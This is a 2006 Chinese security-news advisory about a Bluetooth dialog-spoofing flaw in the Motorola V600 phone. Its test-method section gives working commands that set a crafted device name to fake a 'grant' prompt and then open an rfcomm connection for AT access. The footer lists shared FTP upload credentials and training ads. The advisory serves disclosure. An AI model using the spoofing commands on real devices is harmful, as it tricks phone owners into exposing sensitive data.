安全中国首页 > 新闻中心 > 其他漏洞
 

Motorola蓝牙接口存在对话框伪造漏洞

更新时间:2006-3-25 0:19:18
责任编辑:阿loosen
热 点:
  漏洞信息

  Motorola V600支持蓝牙功能。

  Motorola V600蓝牙接收存在对话框伪造问题,远程攻击者可以利用漏洞获得敏感信息。

  当接收到蓝牙通信时,攻击者可利用该问题诱使用户进入AT访问设备,可借此获得敏感信息。

  BUGTRAQ ID: 17190

  CNCAN ID:CNCAN-2006032305

  漏洞消息时间:2006-03-22

  漏洞起因

  输入验证错误

  影响系统

  Motorola V600

  危害

  远程攻击者可以利用漏洞获得敏感信息。

  攻击所需条件

  攻击者必须可以访问Motorola V600。

  测试方法

  # hciconfig hci0 name `perl -e 'print "Press\x0dgrant\x0dto\x0ddisable\x0dmute\x0d\x0d"'`

  # rfcomm connect 0 00:15:A8:74:87:3E 3 (wait for user to press grant)

  Connected /dev/rfcomm0 to 00:15:A8:74:87:3E on channel 3

  Press CTRL-C for hangup

  厂商解决方案

  联系供应商获得补丁方案:

  http://www.motorola.com/motoinfo/product/details/0,,11,00.html

  漏洞提供者

  Kevin Finisterre

  漏洞消息链接

  http://marc.theaimsgroup.com/?l=bugtraq&m=114304846013066&w=2

  漏洞消息标题

  DMA[2006-0321a] - 'Motorola P2K Platform setpath() overflow and Blueline

 
安全中国网友投稿专用上传FTP空间:
Ftp服务器:download.anqn.com
Ftp端口:21
用户名:anqn
密 码:anqn.com
 
学习软件编程开发技术,推荐加入以下软件编程培训班:
易语言软件编程培训班(简单易学)  Delphi软件编程培训班  VC++软件编程培训班
VB软件编程培训班  JAVA高端编程就业研发班

学习网站开发制作技术,推荐加入以下网站开发培训班:
ASP.net网站开发项目实战班  ASP语言网站建设培训班

学习网络安全入侵防护技术,推荐加入以下技术培训班:
大型网络安全入侵防护班  网站脚本程序全方位安全检测班

学习网络管理、网吧运营维护技术(网管),推荐加入以下培训班:
大型网吧技术管理人才特训班  Linux网络嵌入架构工程师培训班

学习专项特殊技术,推荐加入以下专项技术培训班:
软件与游戏外挂脱壳破解班(逆向工程)  赚钱王道-网赚技能培训班  Flash动画设计师就业特训班